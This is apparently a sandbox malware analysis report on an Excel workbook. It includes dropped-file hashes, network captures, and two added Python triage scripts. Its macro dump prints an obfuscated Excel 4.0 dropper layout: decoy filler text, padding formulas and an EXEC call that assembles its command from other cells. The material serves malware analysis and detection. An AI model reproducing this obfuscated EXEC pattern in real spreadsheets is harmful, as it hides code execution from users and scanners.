SHA1: 219786CBC1D8CCAF9C94935DBC53B3572749538D
SHA-256: ECD6FF6CC2230F4D5166D802F541DFE93248543BFB863BB54370AC61C04AA15D
SHA-512: 6B0E942495B2901907991F133E65C37B0FE4F8DD5BC108D1165053B5EF84EF5CC07892796FB2F569C698B5F76BCFB33F0487A4151FAFC9129012462FE27B21EA
Malicious: false
Preview: [2021/05/03 19:50:33.174] Latest deploy version: ..[2021/05/03 19:50:33.174] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF4DA5B59B47D462E7.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 12933
Entropy (8bit): 0.40734914888761126
Encrypted: false
SSDEEP: 12:c9lCg5/9lCgeK9l26an9l26an9l8fR3F9l8fRV9lTqLBfn3r:c9lLh9lLh9lIn9lIn9lo19loV9lWLt3r
MD5: 66AD2DA0FFD689F8332E81AE155AB5EF
SHA1: FC48340F1F7AC89A943EEA1F1C2F2F0F5AA61FFD
SHA-256: C3A0A97E7020E7758B5C1C0DD02E11B907F2D53AFAA045317DEBDAFCCBC15AE8
SHA-512: BB16900B7A4EEB2C716B8246B5C896CEA90AEA10CFB4D8F6A163E153732C90CAE2DA34BA28850A1462A0A3A9C9AF5A3EE9BBAA0D1B698029325248F36452BF31
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF596DB306FCC36A54.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 12933
Entropy (8bit): 0.4053015674628694
Encrypted: false
SSDEEP: 12:c9lCg5/9lCgeK9l26an9l26an9l8fRVF9l8fRP9lTq/c+CaL+8Z:c9lLh9lLh9lIn9lIn9loP9loP9lW35
MD5: E97475C3C1405B613D0AD71B5804D71B
SHA1: A1CBB28B7C591DD9F068A73ED8B7819CB5BB5D38
SHA-256: D07A3F3BB9F5B200BAB3D45CEB5678AA7A42D0BD61E077EB4CAD00DFC5984437
SHA-512: DE6ECF07F443C6BD4C000D6C2C0299A2261385E28E08B7C5192EC2FC16FC134D9E901BC7931FA2BF0A193E905E8BB2C9E1678DA055172248C2F1306CB15C0C92
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC4112F6E645ECEC7.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 40193
Entropy (8bit): 0.6773372010569979
Encrypted: false
SSDEEP: 192:kBqoxKAuqR+WQKjQ9nN/Dhfx9nN/DhfxynN/Dhfxf:kBqoxKAuqR+WQKjQ9phXph0phR
MD5: B23F19C83A219765CE853B3054D5A626
SHA1: 8D2CCE0C2F2D28F0FD11498538B8A35EFDA828E6
SHA-256: C276B80EA5EB53D5EE5B121ED87E99697077B27ED84A09893E129D10872022A5
SHA-512: 09253A921B0C3AD873A2BF13408C7A3F7A30475C67E4EE7E959A98D563F8E1D94498622D1879A3AB8BB4C15F215531B42F632976CF206D7427B8CD2D509FD488
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFD87FF62AF0A6347E.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12933
                                                                                                                                                                            Entropy (8bit):0.40709120417340766
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9lo/9lo/9lW1mWJD:kBqoIg+1mWJD
                                                                                                                                                                            MD5:732945D7378D99607C39FF5D179B894A
                                                                                                                                                                            SHA1:BD5EC7C8DBF4037E9E2AEBE00E9F26B7FFB5A65E
                                                                                                                                                                            SHA-256:30BADA595841D2C499E0E66F34E674F8FB294D2644DD033890D888D49A68EEEE
                                                                                                                                                                            SHA-512:530BE9664FF3E7EC184CE2693B675D0756E8BFEDDDEF91EF3DBDAF8FC556E2464F5C403C0E4C7E1673B2025F8618C8F1A3FA33AD0692C1B54CFE7CF39BDAC75A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFE7296AD5C85F4BE9.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40145
                                                                                                                                                                            Entropy (8bit):0.6713572692688405
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+Z3lUXtU0NFNqtU0NFNqd0NFNqO:kBqoxKAuqR+Z3lUXtU08U0s0Z
                                                                                                                                                                            MD5:F8326EF40399170003450B8860BE7AB7
                                                                                                                                                                            SHA1:6EE5147E012E545AA4D23ECE008A6264B611CA70
                                                                                                                                                                            SHA-256:FF71BBAEB602B268A0F312D6B6EC8D0F0C780F13EF3BB2463473A336E55943A0
                                                                                                                                                                            SHA-512:0CB3A57437527357454F3B416127FD9C14BCC78E386A86F61B1B272330726CACC893A56313E806C19ADCD72B41A51CF6BBF9C273A137EF74DC0AB04331D4D726
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFEF08F5C4CE8758CE.TMP
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40225
                                                                                                                                                                            Entropy (8bit):0.684855061118958
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+1bZILKsWjB1XLsWjB1X4sWjB1X1:kBqoxKAuqR+1bZILKpzXLpzX4pzX1
                                                                                                                                                                            MD5:0A82DCAAB853CB2F305ABE124B0277C6
                                                                                                                                                                            SHA1:E04239EBAB6A852461F2DCF030E393E60BCE30D7
                                                                                                                                                                            SHA-256:6FE8B3FD065A6446A3BC62EC7054B251C39CCD3B03EDAA4ABA7827F284013112
                                                                                                                                                                            SHA-512:9870C1BA3BB88AB2B25C2B319305E2C296A2E4A4BADA0CF073EE3188CF53199D974298F8A9BA339097B2EB4747575DE7CD87666EDD414EECBA01ED1A37F2AA9F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22
                                                                                                                                                                            Entropy (8bit):2.9808259362290785
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                            MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                            SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                            SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                            SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                            C:\Users\user\Desktop\~$6613n246zm543w.xlsb
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):165
                                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                            MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                            SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                            SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                            SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                            Entropy (8bit):7.911297837534263
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                            • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                            File name:6613n246zm543w.xlsb
                                                                                                                                                                            File size:96580
                                                                                                                                                                            MD5:f5ac70a6e136e274a8856f244c9183b7
                                                                                                                                                                            SHA1:3991a3a8ec56ee8487ff17e226c49f2355b9d3ac
                                                                                                                                                                            SHA256:1f7a0472872d38133ce9fef933631d5110cf076ec44f344a95bd683e73fdbdc9
                                                                                                                                                                            SHA512:1ba0bea61dfac810bac779623d3807845cc92392a8a7a17333dfcc4d885e2a7b9ceab5ec2babc0df1c6bba88236b9292d8337d4e3bf10f6f4eaaa8e6d1e4632a
                                                                                                                                                                            SSDEEP:1536:H1HIOM4OJJN+AmifYAOETzIdJ6k4ZqOUEpiD4ALVAifrcz0YDxAt2YigNRZ3T:pBMpBwpk8yRZqTEpUPjy0Yet2YvHZj
                                                                                                                                                                            File Content Preview:PK..........!...."............docProps/app.xml ...(............................................................................................................................................................................................................

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                            Static OLE Info

                                                                                                                                                                            General

                                                                                                                                                                            Document Type:OpenXML
                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                            OLE File "6613n246zm543w.xlsb"

                                                                                                                                                                            Indicators

                                                                                                                                                                            Has Summary Info:
                                                                                                                                                                            Application Name:
                                                                                                                                                                            Encrypted Document:
                                                                                                                                                                            Contains Word Document Stream:
                                                                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                                                                            Contains Visio Document Stream:
                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                            Contains VBA Macros:

                                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. An nam debet instructior, commodo mediocrem id cum. Eu cum iuvaret debitis voluptatibus, esse perfecto reformidans id has. Odio contentiones sed cu, usu commodo prompta prodesset id. Vivendum dignissim conceptam pri ut, ei vel partem audiam sapientem.Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. Vix paulo sanctus scripserit ex, te iriure insolens voluptatum qui. Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula.An eos iusto solet, id mel dico habemus. An nam debet instructior, commodo mediocrem id cum. Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula. Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando.Tation delenit percipitur at vix. Magna copiosae apeirian ius at. Per cu iracundia splendide. Odio contentiones sed cu, usu commodo prompta prodesset id. Magna copiosae apeirian ius at. Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. Per in illud petentium iudicabit, integre sententiae pro no.Vix paulo sanctus scripserit ex, te iriure insolens voluptatum qui. Nisl omittam complectitur pro an, quem omnes munere id vix. Ceteros assentior omittantur cum ad. Ius dicat feugiat no, vix cu modo dicat principes. Nec labore cetero theophrastus no, ei vero facer veritus nec.Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula. An nam debet instructior, commodo mediocrem id cum. Lorem ipsum dolor sit amet, an eos lorem ancillae expetenda, vim et utamur quaestio. 
Decoy text cell (tail of a cell that begins on the preceding row; the same filler is repeated across the sheet): Eam id posse dictas voluptua, veniam laoreet oportere no mea, quis regione suscipiantur mea an.Oratio accumsan et mea. Eu cum iuvaret debitis voluptatibus, esse perfecto reformidans id has. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui. Sale liber et vel. Ius dicat feugiat no, vix cu modo dicat principes.Tation delenit percipitur at vix. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui. An eos iusto solet, id mel dico habemus. An nam debet instructior, commodo mediocrem id cum.Per cu iracundia splendide. Vivendum dignissim conceptam pri ut, ei vel partem audiam sapientem. An eos iusto solet, id mel dico habemus. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui.
[empty cells]
Formula cell (padding formulas with constant arguments, then the EXEC call whose argument is concatenated from six other cells):
=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846) (this triplet is repeated seven times before the EXEC)
=EXEC('=""''       FDJDFJKERJKJKER ""'' ''='!BL47&'=""''       FDJDFJKERJKJKER ""'' ''='!BL48&'=""''       FDJDFJKERJKJKER ""'' ''='!BQ24&'=""''       FDJDFJKERJKJKER ""'' ''='!BM47&'=""''       FDJDFJKERJKJKER ""'' ''='!BM48&'=""''       FDJDFJKERJKJKER ""'' ''='!BM49)
=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=AS (cut off here in the report)
[empty cells]
Decoy text cell (repeated on the following rows, each copy followed by a long run of empty cells): Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. An nam debet instructior, commodo mediocrem id cum. Eu cum iuvaret debitis voluptatibus, esse perfecto reformidans id has. Odio contentiones sed cu, usu commodo prompta prodesset id. Vivendum dignissim conceptam pri ut, ei vel partem audiam sapientem.Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. Vix paulo sanctus scripserit ex, te iriure insolens voluptatum qui. Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula.An eos iusto solet, id mel dico habemus. An nam debet instructior, commodo mediocrem id cum. Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula. Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando.Tation delenit percipitur at vix. Magna copiosae apeirian ius at. Per cu iracundia splendide. Odio contentiones sed cu, usu commodo prompta prodesset id. Magna copiosae apeirian ius at. Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando. Per in illud petentium iudicabit, integre sententiae pro no.Vix paulo sanctus scripserit ex, te iriure insolens voluptatum qui. Nisl omittam complectitur pro an, quem omnes munere id vix. Ceteros assentior omittantur cum ad. Ius dicat feugiat no, vix cu modo dicat principes. Nec labore cetero theophrastus no, ei vero facer veritus nec.Vel in dicant cetero phaedrum, usu populo interesset cu, eum ea facer nostrum pericula. An nam debet instructior, commodo mediocrem id cum. Lorem ipsum dolor sit amet, an eos lorem ancillae expetenda, vim et utamur quaestio. Eam id posse dictas voluptua, veniam laoreet oportere no mea, quis regione suscipiantur mea an.Oratio accumsan et mea. Eu cum iuvaret debitis voluptatibus, esse perfecto reformidans id has. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui. Sale liber et vel. Ius dicat feugiat no, vix cu modo dicat principes.Tation delenit percipitur at vix. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui. An eos iusto solet, id mel dico habemus. An nam debet instructior, commodo mediocrem id cum.Per cu iracundia splendide. Vivendum dignissim conceptam pri ut, ei vel partem audiam sapientem. An eos iusto solet, id mel dico habemus. Mandamus abhorreant deseruisse mea at, mea elit deserunt persequeris at, in putant fuisset honestatis qui.
[empty cells]
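The macro sheet dumped above follows a common Excel 4.0 dropper layout: large filler cells of pseudo-Latin text, runs of ASIN/ACOS formulas with constant arguments that do nothing but bulk up the sheet, and a single EXEC whose argument is assembled at run time by concatenating six other cells (BL47, BL48, BQ24, BM47, BM48, BM49), so the command line never appears literally in the static dump. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it reads one dumped sheet row in the CSV-like layout the report uses, separates empty cells, decoy text cells and padding formulas from the formulas that matter, and lists the cells each EXEC pulls its argument from. The SAMPLE_ROW input is constructed from the report's own text (shortened), and the lists of padding and suspicious XLM functions are the author's assumptions, not a complete catalogue.

```python
"""Triage a dumped Excel 4.0 (XLM) sheet row: separate padding from EXEC calls.

Added example; not code from the Joe Sandbox report or from the analysed sample.
"""
import csv
import re

# Assumed lists, not exhaustive: functions the dropper uses as padding, and
# XLM functions that execute code or write files.
NOISE_FUNCS = {"ASIN", "ACOS", "ATAN", "SIN", "COS", "TAN", "LOG", "EXP", "SQRT"}
SUSPICIOUS_FUNCS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL",
                    "FOPEN", "FWRITE", "RUN"}

FUNC_RE = re.compile(r"^=([A-Z][A-Z0-9.]*)\((.*)\)$", re.S)
CONST_ARGS_RE = re.compile(r"^[\d.,\s]*$")
# '!BL47' style references to cells on the same sheet.
CELL_REF_RE = re.compile(r"!\$?([A-Z]{1,3}\$?\d+)")

# Constructed sample row, shortened from the report: three empty cells, a decoy
# text cell, empty cells, then the fused formula cell (CSV-quoted, so a literal
# double quote inside the cell appears as "").
_PAD = "'=\"\"''       FDJDFJKERJKJKER \"\"'' ''='!"
EXEC_CELL = ("=EXEC(" + _PAD + "BL47&" + _PAD + "BL48&" + _PAD + "BQ24&"
             + _PAD + "BM47&" + _PAD + "BM48&" + _PAD + "BM49)")
NOISE_RUN = "=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)"
SAMPLE_ROW = (
    ',,,"Eu eam dolores lobortis percipitur, quo te equidem deleniti disputando.",,,,'
    + '"' + NOISE_RUN * 2 + EXEC_CELL
    + '=ASIN(456346564848556)=ACOS(45654645646546)",,'
)


def split_formulas(cell: str) -> list:
    """Split a cell whose dump fused several formulas ('=A(1)=B(2)') at the
    '=' characters that sit outside any parentheses, so the '=' inside the
    EXEC string argument is left alone."""
    out, cur, depth = [], [], 0
    for ch in cell:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(depth - 1, 0)
        if ch == "=" and depth == 0 and cur:
            out.append("".join(cur))
            cur = []
        cur.append(ch)
    if cur:
        out.append("".join(cur))
    return out


def classify(formula: str) -> str:
    """'noise' for a padding function with only numeric arguments,
    'suspicious' for code-execution functions, 'other' for everything else."""
    m = FUNC_RE.match(formula)
    if not m:
        return "other"
    func, args = m.group(1), m.group(2)
    if func in SUSPICIOUS_FUNCS:
        return "suspicious"
    if func in NOISE_FUNCS and CONST_ARGS_RE.match(args):
        return "noise"
    return "other"


def triage_row(row: str) -> dict:
    """Count cell kinds in one dumped row and describe each suspicious formula
    with the cells its argument references (the pieces an analyst must read
    to reconstruct the command)."""
    fields = next(csv.reader([row]))
    report = {"empty": 0, "text": 0, "noise": 0, "other": 0, "suspicious": []}
    for field in fields:
        if field == "":
            report["empty"] += 1
        elif not field.startswith("="):
            report["text"] += 1
        else:
            for formula in split_formulas(field):
                kind = classify(formula)
                if kind == "suspicious":
                    report["suspicious"].append({
                        "func": FUNC_RE.match(formula).group(1),
                        "refs": CELL_REF_RE.findall(formula),
                        "formula": formula,
                    })
                else:
                    report[kind] += 1
    return report


if __name__ == "__main__":
    result = triage_row(SAMPLE_ROW)
    print({k: v for k, v in result.items() if k != "suspicious"})
    for s in result["suspicious"]:
        print(s["func"], "builds its argument from cells:", ", ".join(s["refs"]))
```

Because the EXEC argument is only resolved when the macro runs, the static dump tells you which cells to go and read (or which runtime child process of EXCEL.EXE to look at in the Startup section); it does not give you the command line itself.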

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID  Message                                        Source Port  Dest Port  Source IP    Dest IP
05/03/21-19:47:59.511733  ICMP      402  ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.4  8.8.8.8
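The TCP Packets table that follows lists every packet of the sandbox host's session with 162.241.24.47:80 one per line, which is hard to read as a connection. The script below is an added example, not part of the Joe Sandbox report: it parses rows in that table's layout (timestamp, source port, destination port, source IP, destination IP), groups them into bidirectional flows, records which side initiated, counts packets per direction and reports the non-private responder endpoints as IOC candidates. SAMPLE_PACKETS is a constructed subset of the report's rows.

```python
"""Turn a sandbox packet list into per-flow facts.

Added example; not code from the Joe Sandbox report.
"""
import ipaddress
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: the first six rows of the TCP Packets table in this report.
SAMPLE_PACKETS = """\
May 3, 2021 19:48:15.719537020 CEST  49740  80     192.168.2.4    162.241.24.47
May 3, 2021 19:48:15.892509937 CEST  80     49740  162.241.24.47  192.168.2.4
May 3, 2021 19:48:15.893599033 CEST  49740  80     192.168.2.4    162.241.24.47
May 3, 2021 19:48:15.894133091 CEST  49740  80     192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.073235989 CEST  80     49740  162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084395885 CEST  80     49740  162.241.24.47  192.168.2.4
"""


@dataclass(frozen=True)
class Packet:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_packet(line: str) -> Packet:
    """Parse one row. The report prints nine fractional digits; datetime keeps
    microseconds, so the last three digits are dropped."""
    p = line.split()
    clock, frac = p[3].split(".")
    ts = datetime.strptime(f"{p[0]} {p[1]} {p[2]} {clock}.{frac[:6]}",
                           "%b %d, %Y %H:%M:%S.%f")
    return Packet(ts, p[7], int(p[5]), p[8], int(p[6]))


def summarize_flows(table: str) -> dict:
    """Group packets by endpoint pair. The side that sent the earliest packet
    is recorded as the initiator (client); the other as the responder."""
    flows = {}
    for line in table.splitlines():
        if not line.strip():
            continue
        pkt = parse_packet(line)
        key = tuple(sorted([(pkt.src, pkt.sport), (pkt.dst, pkt.dport)]))
        f = flows.setdefault(key, {
            "initiator": (pkt.src, pkt.sport),
            "responder": (pkt.dst, pkt.dport),
            "to_responder": 0, "to_initiator": 0,
            "first": pkt.ts, "last": pkt.ts,
        })
        if (pkt.src, pkt.sport) == f["initiator"]:
            f["to_responder"] += 1
        else:
            f["to_initiator"] += 1
        f["first"] = min(f["first"], pkt.ts)
        f["last"] = max(f["last"], pkt.ts)
    for f in flows.values():
        f["duration_s"] = (f["last"] - f["first"]).total_seconds()
    return flows


def external_servers(flows: dict) -> set:
    """Responder endpoints outside private address space: IOC candidates."""
    return {f["responder"] for f in flows.values()
            if not ipaddress.ip_address(f["responder"][0]).is_private}


if __name__ == "__main__":
    for f in summarize_flows(SAMPLE_PACKETS).values():
        print(f"{f['initiator']} -> {f['responder']}: "
              f"{f['to_responder']} out / {f['to_initiator']} in, "
              f"{f['duration_s']:.3f}s")
    print("external servers:", external_servers(summarize_flows(SAMPLE_PACKETS)))
```

The direction counts are what make the table useful: a short burst of client packets followed by a long run of server-to-client segments on port 80 is the shape of a file download, which matches the "Downloads executable code via HTTP" signature in the report's header.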

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
May 3, 2021 19:48:15.719537020 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:15.892509937 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:15.893599033 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:15.894133091 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.073235989 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084395885 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084423065 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084435940 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084449053 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084465981 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084486008 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084508896 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084525108 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.084530115 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084549904 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084569931 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.084573030 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.084618092 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.084629059 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265486956 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265604019 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265691042 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265763044 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265772104 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265825987 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265835047 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265870094 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265882969 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265908957 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265932083 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265949965 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.265981913 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.265990019 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266006947 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266037941 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266053915 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266082048 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266103983 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266120911 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266141891 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266169071 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266182899 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266211987 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266235113 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266249895 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266274929 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266289949 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266308069 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266330004 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266360044 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266366959 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266407013 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266418934 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266458035 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266463041 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266469955 CEST  49740        80         192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.266508102 CEST  80           49740      162.241.24.47  192.168.2.4
May 3, 2021 19:48:16.266514063 CEST  49740        80         192.168.2.4    162.241.24.47
